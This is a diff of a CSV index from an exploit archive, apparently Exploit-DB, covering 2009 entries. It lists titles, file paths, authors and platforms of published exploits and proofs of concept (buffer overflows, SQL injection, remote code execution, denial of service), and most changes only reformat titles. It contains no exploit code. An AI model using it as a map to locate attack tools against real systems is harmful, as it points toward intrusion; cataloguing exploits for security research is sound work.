Buffer Overflow Exploit (SEH) (1)",2009-04-13,His0k4,windows,remote,8000 +8422,platforms/windows/remote/8422.py,"Steamcast - (HTTP Request) Remote Buffer Overflow Exploit (SEH) (2)",2009-04-13,His0k4,windows,remote,8000 8423,platforms/php/webapps/8423.txt,"Jamroom (index.php t) Local File Inclusion Vulnerability",2009-04-14,zxvf,php,webapps,0 8424,platforms/php/webapps/8424.txt,"ablespace 1.0 (xss/bsql) Multiple Vulnerabilities",2009-04-14,DSecRG,php,webapps,0 8425,platforms/php/webapps/8425.txt,"php-revista 1.1.2 (rfi/sqli/cb/xss) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0 @@ -7994,7 +7994,7 @@ id,file,description,date,author,platform,type,port 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 (Auth Bypass) Insecure Cookie Handling Vuln",2009-04-20,"ThE g0bL!N",php,webapps,0 8487,platforms/php/webapps/8487.txt,"EZ Webitor (Auth Bypass) SQL Injection Vulnerability",2009-04-20,snakespc,php,webapps,0 8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 (editlink.php id) Blind SQL Injection Exploit",2009-04-20,"Rohit Bansal",php,webapps,0 -8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 +8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - (.m3u File) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)",2009-04-20,h00die,hardware,dos,0 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b (Insecure Cookie Handling) Blind SQL Injection Exploit",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 Insecure Cookie Handling Vulnerability",2009-04-20,"ThE g0bL!N",php,webapps,0 @@ -8024,15 +8024,15 @@ id,file,description,date,author,platform,type,port 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities",2009-04-22,ahmadbady,php,webapps,0 8517,platforms/php/webapps/8517.txt,"Joomla Component rsmonials Remote Cross Site Scripting Exploit",2009-04-22,jdc,php,webapps,0 8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 Arbitrary File Disclosure Exploit",2009-04-22,Stack,windows,remote,0 -8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0 -8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit #2",2009-04-22,His0k4,windows,local,0 +8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0 +8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 (ab/lfi/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 8522,platforms/windows/dos/8522.pl,"Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0 8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0 8526,platforms/windows/dos/8526.py,"Popcorn 1.87 Remote Heap Overflow Exploit PoC",2009-04-23,x.CJP.x,windows,dos,0 -8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow Exploit",2009-04-23,Stack,windows,local,0 +8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow Exploit",2009-04-23,Stack,windows,local,0 8528,platforms/asp/webapps/8528.txt,"Absolute Form Processor XE-V 1.5 (auth Bypass) SQL Injection Vuln",2009-04-24,"ThE g0bL!N",asp,webapps,0 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln",2009-04-24,ZoRLu,asp,webapps,0 8530,platforms/asp/webapps/8530.htm,"Absolute Form Processor XE-V 1.5 - Remote Change Pasword Exploit",2009-04-24,"ThE g0bL!N",asp,webapps,0 @@ -8040,12 +8040,12 @@ id,file,description,date,author,platform,type,port 8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - (sql/xss) Multiple Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0 8533,platforms/php/webapps/8533.txt,"Pragyan CMS 2.6.4 - Multiple SQL Injection Vulnerabilities",2009-04-24,"Salvatore Fresta",php,webapps,0 8534,platforms/linux/local/8534.c,"libvirt_proxy <= 0.5.1 - Local Privilege Escalation Exploit",2009-04-27,"Jon Oberheide",linux,local,0 -8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit",2009-04-27,G4N0K,windows,local,0 -8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)",2009-04-27,His0k4,windows,local,0 +8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 - (.rdl) Local Buffer Overflow Exploit",2009-04-27,G4N0K,windows,local,0 +8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow Exploit (SEH)",2009-04-27,His0k4,windows,local,0 8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 (dt/fd) Multiple Vulnerabilities",2009-04-27,"Alfons Luja",windows,remote,0 8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 Active XSS & Path Disclosure Vulns",2009-04-27,brain[pillow],php,webapps,0 8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 (route) Local File Inclusion Vulnerability",2009-04-27,OoN_Boy,php,webapps,0 -8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH) #2",2009-04-27,SimO-s0fT,windows,local,0 +8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow Exploit (SEH) (2)",2009-04-27,SimO-s0fT,windows,local,0 8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 (.m3u) - File Buffer Overflow Exploit (seh)",2009-04-27,Nine:Situations:Group,windows,local,0 8542,platforms/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 Base64FileEncode() BOF PoC",2009-04-27,Nine:Situations:Group,windows,dos,0 8543,platforms/php/webapps/8543.php,"LightBlog <= 9.9.2 (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0 @@ -8091,11 +8091,11 @@ id,file,description,date,author,platform,type,port 8585,platforms/php/webapps/8585.txt,"Golabi CMS <= 1.0.1 Session Poisoning Vulnerability",2009-05-01,CrazyAngel,php,webapps,0 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b Multiple SQL Injection Vulnerabilities",2009-05-01,YEnH4ckEr,php,webapps,0 8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0 -8588,platforms/windows/dos/8588.pl,"Beatport Player 1.0.0.283 (.M3U File) Local Buffer Overflow PoC",2009-05-01,SirGod,windows,dos,0 +8588,platforms/windows/dos/8588.pl,"Beatport Player 1.0.0.283 - (.M3U File) Local Buffer Overflow PoC",2009-05-01,SirGod,windows,dos,0 8589,platforms/windows/local/8589.py,"RM Downloader (.smi File) Local Stack Overflow Exploit",2009-05-01,"ThE g0bL!N",windows,local,0 -8590,platforms/windows/local/8590.py,"Beatport Player 1.0.0.283 (.m3u) Local SEH Overwrite Exploit",2009-05-01,His0k4,windows,local,0 -8591,platforms/windows/local/8591.py,"Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #2",2009-05-01,"Encrypt3d.M!nd ",windows,local,0 -8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #3",2009-05-01,Stack,windows,local,0 +8590,platforms/windows/local/8590.py,"Beatport Player 1.0.0.283 - (.m3u) Local SEH Overwrite Exploit",2009-05-01,His0k4,windows,local,0 +8591,platforms/windows/local/8591.py,"Beatport Player 1.0.0.283 - (.M3U File) Local Stack Overflow Exploit (2)",2009-05-01,"Encrypt3d.M!nd ",windows,local,0 +8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - (.M3U File) Local Stack Overflow Exploit (3)",2009-05-01,Stack,windows,local,0 8593,platforms/php/webapps/8593.txt,"pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability",2009-05-01,SirGod,php,webapps,0 8594,platforms/windows/local/8594.pl,"RM Downloader (.smi File) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0 8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0 @@ -8464,7 +8464,7 @@ id,file,description,date,author,platform,type,port 8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 Unicode Buffer Overrun/DoS Vulnerability",2009-06-16,LiquidWorm,windows,dos,0 8974,platforms/php/webapps/8974.txt,"XOOPS <= 2.3.3 - Remote File Disclosure Vulnerability (.htaccess)",2009-06-16,daath,php,webapps,0 8975,platforms/php/webapps/8975.txt,"phpFK 7.03 (page_bottom.php) Local File Inclusion Vulnerability",2009-06-17,ahmadbady,php,webapps,0 -8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server Low Bandwidth Denial of Service (slowloris.pl)",2009-06-17,RSnake,multiple,dos,0 +8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server - Low Bandwidth Denial of Service (slowloris.pl)",2009-06-17,RSnake,multiple,dos,0 8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injection Vulnerabilities",2009-06-17,n3wb0ss,php,webapps,0 8978,platforms/php/webapps/8978.txt,"fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC",2009-06-17,StAkeR,php,webapps,0 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion Vulnerabilities",2009-06-17,YEnH4ckEr,php,webapps,0 @@ -8477,7 +8477,7 @@ id,file,description,date,author,platform,type,port 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-06-22,HxH,cgi,webapps,0 8988,platforms/php/webapps/8988.txt,"pc4 Uploader <= 10.0 - Remote File Disclosure Vulnerability",2009-06-22,Qabandi,php,webapps,0 8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - Remote SQL/XSS Injection Vulnerabilities",2009-06-22,"ThE g0bL!N",php,webapps,0 -8991,platforms/multiple/dos/8991.php,"Multiple HTTP Server Low Bandwidth Denial of Service #2",2009-06-22,evilrabbi,multiple,dos,0 +8991,platforms/multiple/dos/8991.php,"Multiple HTTP Server - Low Bandwidth Denial of Service (2)",2009-06-22,evilrabbi,multiple,dos,0 8992,platforms/php/webapps/8992.php,"pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit",2009-06-22,"Hacking Expose!",php,webapps,0 8993,platforms/php/webapps/8993.txt,"elgg (xss/csrf/change password) Multiple Vulnerabilities",2009-06-22,lorddemon,php,webapps,0 8994,platforms/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x Insecure Cookie Vulnerability",2009-06-22,TiGeR-Dz,php,webapps,0 @@ -8696,7 +8696,7 @@ id,file,description,date,author,platform,type,port 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection Vulnerability",2009-07-20,Vrs-hCk,php,webapps,0 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-07-20,InjEctOr5,php,webapps,0 9220,platforms/windows/dos/9220.pl,"KMplayer <= 2.9.4.1433 (.srt File) Local Buffer Overflow PoC",2009-07-20,b3hz4d,windows,dos,0 -9221,platforms/windows/local/9221.pl,"WINMOD 1.4 (.lst File) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0 +9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - (.lst) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0 9222,platforms/windows/dos/9222.cpp,"FlyHelp (.CHM File) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0 9224,platforms/windows/remote/9224.py,"MS Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 @@ -8704,9 +8704,9 @@ id,file,description,date,author,platform,type,port 9226,platforms/php/webapps/9226.txt,"phpdirectorysource (xss/sql) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script (url) Local File Disclosure Vulnerability",2009-07-21,Moudi,php,webapps,0 9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 (.ofl File) Local Heap Overflow PoC",2009-07-22,hack4love,windows,dos,0 -9229,platforms/windows/local/9229.py,"WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH) #2",2009-07-22,Dz_Girl,windows,local,0 +9229,platforms/windows/local/9229.py,"WINMOD 1.4 - (.lst) Universal Buffer Overflow Exploit (SEH) (2)",2009-07-22,Dz_Girl,windows,local,0 9231,platforms/php/webapps/9231.txt,"Phorum <= 5.2.11 Permanent Cross Site Scripting Vulnerabilities",2009-07-22,Crashfr,php,webapps,0 -9234,platforms/windows/local/9234.pl,"WINMOD 1.4 (.lst) Local Stack Overflow Exploit",2009-07-23,"CWH Underground",windows,local,0 +9234,platforms/windows/local/9234.pl,"WINMOD 1.4 - (.lst) Local Stack Overflow Exploit",2009-07-23,"CWH Underground",windows,local,0 9235,platforms/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 readfile() Local File Disclosure Exploit",2009-07-23,NoGe,php,webapps,0 9236,platforms/php/webapps/9236.txt,"GLinks 2.1 (cat) Remote Blind SQL Injection Vulnerability",2009-07-23,"599eme Man",php,webapps,0 9237,platforms/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Auth Bypass Vulnerabilities",2009-07-23,SwEET-DeViL,php,webapps,0 @@ -8770,7 +8770,7 @@ id,file,description,date,author,platform,type,port 9296,platforms/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps,0 9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion Vulnerability",2009-07-28,NoGe,php,webapps,0 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit (update)",2009-07-30,corelanc0d3r,windows,local,0 -9299,platforms/windows/local/9299.pl,"WINMOD 1.4 (.lst) Local Stack Overflow Exploit XP SP3 (RET+SEH) #3",2009-07-28,corelanc0d3r,windows,local,0 +9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - (.lst) Local Stack Overflow Exploit XP SP3 (RET+SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC",2009-07-30,kingcope,multiple,dos,0 9301,platforms/windows/local/9301.txt,"Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit",2009-07-30,"NT Internals",windows,local,0 9302,platforms/linux/local/9302.py,"Compface 1.1.5 (.xbm File) Local Buffer Overflow Exploit",2009-07-30,His0k4,linux,local,0 @@ -8792,7 +8792,7 @@ id,file,description,date,author,platform,type,port 9318,platforms/windows/remote/9318.py,"VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)",2009-07-31,His0k4,windows,remote,0 9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager Remote BOF Exploit",2009-08-01,Bruk0ut,windows,remote,30000 9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - (forum.php qc) Remote SQL Injection Exploit",2009-08-01,rEcruit,php,webapps,0 -9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 (.pls) Universal Buffer Overflow Exploit (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0 +9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 - (.pls) Universal Buffer Overflow Exploit (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b Multiple Remote File Inclusion Vulnerabilities",2009-08-01,NoGe,php,webapps,0 9323,platforms/multiple/dos/9323.txt,"VirtualBox 2.2 - 3.0.2 r49928 Local Host Reboot PoC",2009-08-01,"Tadas Vilkeliskis",multiple,dos,0 9324,platforms/php/webapps/9324.txt,"Joomla Component com_jfusion (Itemid) Blind SQL Injection Vuln",2009-08-01,"Chip d3 bi0s",php,webapps,0 @@ -8878,15 +8878,15 @@ id,file,description,date,author,platform,type,port 9409,platforms/windows/local/9409.pl,"MediaCoder 0.7.1.4490 (.lst/.m3u) Universal BOF Exploit (SEH)",2009-08-10,hack4love,windows,local,0 9410,platforms/php/webapps/9410.txt,"Wordpress <= 2.8.3 - Remote Admin Reset Password Vulnerability",2009-08-11,"laurent gaffié ",php,webapps,0 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 Remote Buffer Overflow PoC",2009-08-11,"fl0 fl0w",windows,dos,0 -9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0 +9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln",2009-08-11,kkr,php,webapps,0 9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 (systemid) SQL Injection Vulnerability",2009-08-11,"Guilherme Marinheiro",php,webapps,0 9417,platforms/windows/dos/9417.txt,"MS Windows 2003 (EOT File) BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0 -9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH) #2",2009-08-11,"ThE g0bL!N",windows,local,0 +9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-12,"Pedro Laguna",php,webapps,0 -9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)",2009-08-12,hack4love,windows,local,0 +9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 (gallery.php) Arbitrary Delete/Edit Category Vuln",2009-08-12,"ilker Kandemir",php,webapps,0 -9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway Authentication Bypass & Password Reset Vulnerabilities",2009-08-12,hkm,hardware,remote,0 +9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass & Password Reset Vulnerabilities",2009-08-12,hkm,hardware,remote,0 9423,platforms/windows/dos/9423.pl,"MS Wordpad on winXP SP3 Local Crash Exploit",2009-08-12,murderkey,windows,dos,0 9424,platforms/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injection Vulnerabilities",2009-08-12,"Sense of Security",php,webapps,0 9425,platforms/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / RCE Exploit",2009-08-12,IHTeam,php,webapps,0 @@ -8910,7 +8910,7 @@ id,file,description,date,author,platform,type,port 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 Multiple Local File Inclusion Vulnerabilities",2009-08-18,jetli007,php,webapps,0 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection Exploit",2009-08-18,IRCRASH,php,webapps,0 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 -9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x (store.php id) SQL Injection Exploit",2009-08-18,NoGe,php,webapps,0 +9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection Exploit",2009-08-18,NoGe,php,webapps,0 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client tgbvpn.sys Local DoS Exploit",2009-08-18,Evilcry,windows,dos,0 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 (RCE/CSRF/LFI/XSS) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 @@ -8922,7 +8922,7 @@ id,file,description,date,author,platform,type,port 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem Arbitrary Add Admin User Vulnerability",2009-08-18,SuNHouSe2,hardware,remote,0 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 (.xpl) Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 -9459,platforms/php/webapps/9459.txt,"2WIRE Gateway (Auth Bypass & Password Reset) Vulnerabilities #2",2009-08-18,bugz,php,webapps,0 +9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Auth Bypass & Password Reset Vulnerabilities (2)",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"autonomous lan party <= 0.98.3 - Remote File Inclusion Vulnerability",2009-08-18,"cr4wl3r ",php,webapps,0 9461,platforms/php/webapps/9461.txt,"E Cms <= 1.0 (index.php s) Remote SQL Injection Vulnerability",2009-08-18,Red-D3v1L,php,webapps,0 9462,platforms/php/webapps/9462.txt,"Infinity <= 2.x.x options[style_dir] Local File Disclosure Vulnerability",2009-08-18,SwEET-DeViL,php,webapps,0 @@ -9079,7 +9079,7 @@ id,file,description,date,author,platform,type,port 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BOF Exploits (SEH)",2009-09-09,hack4love,windows,local,0 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BOF (SEH)",2009-09-09,hack4love,windows,local,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0 -9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 (Get Request) Denial of Service Vulnerability",2009-09-10,"Usman Saeed",windows,dos,0 +9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 - (Get Request) Denial of Service Vulnerability",2009-09-10,"Usman Saeed",windows,dos,0 9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 (LIST command) Format String DoS Exploit",2009-09-10,corelanc0d3r,windows,dos,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple RFI Vulnerabilities",2009-09-10,Kurd-Team,php,webapps,0 9624,platforms/windows/local/9624.py,"KSP 2009R2 (m3u) Universal Local Buffer Overflow Exploit (SEH)",2009-09-10,hack4love,windows,local,0 @@ -9096,19 +9096,19 @@ id,file,description,date,author,platform,type,port 9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal (admin_news_bot.php) RFI Vulnerability",2009-09-10,"EA Ngel",php,webapps,0 9636,platforms/php/webapps/9636.txt,"An image gallery 1.0 (navigation.php) Local Directory Traversal Vuln",2009-09-10,"ThE g0bL!N",php,webapps,0 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0 -9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0 +9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0 9640,platforms/php/webapps/9640.txt,"gyro 5.0 (sql/xss) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812 9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal vulnerability",2009-09-11,"Usman Saeed",windows,remote,0 -9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80 +9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor (maincat_id) Remote SQL Injection Vulnerability",2009-09-11,noname,php,webapps,0 9648,platforms/php/webapps/9648.txt,"Joomla Hotel Booking System - XSS/SQL Injection Multiple Vulnerabilities",2009-09-11,K-159,php,webapps,0 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 Arbitrary Source Code Disclosure Vuln",2009-09-11,Dr_IDE,windows,remote,0 -9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #2",2009-09-11,Dr_IDE,windows,remote,0 +9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Remote Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0 9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0 9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit",2009-09-14,ikki,windows,remote,80 9653,platforms/php/webapps/9653.txt,"Joomla Component Turtushout 0.11 (Name) SQL Injection Vulnerability",2009-09-14,jdc,php,webapps,0 @@ -9189,11 +9189,11 @@ id,file,description,date,author,platform,type,port 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 -9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0 +9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 9800,platforms/windows/remote/9800.cpp,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler exploit",2009-09-29,bruiser,windows,remote,0 -9803,platforms/windows/remote/9803.html,"Multiple EMC products utilizing keyhelp.ocx 1.2.312",2009-09-29,pyrokinesis,windows,remote,0 +9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0 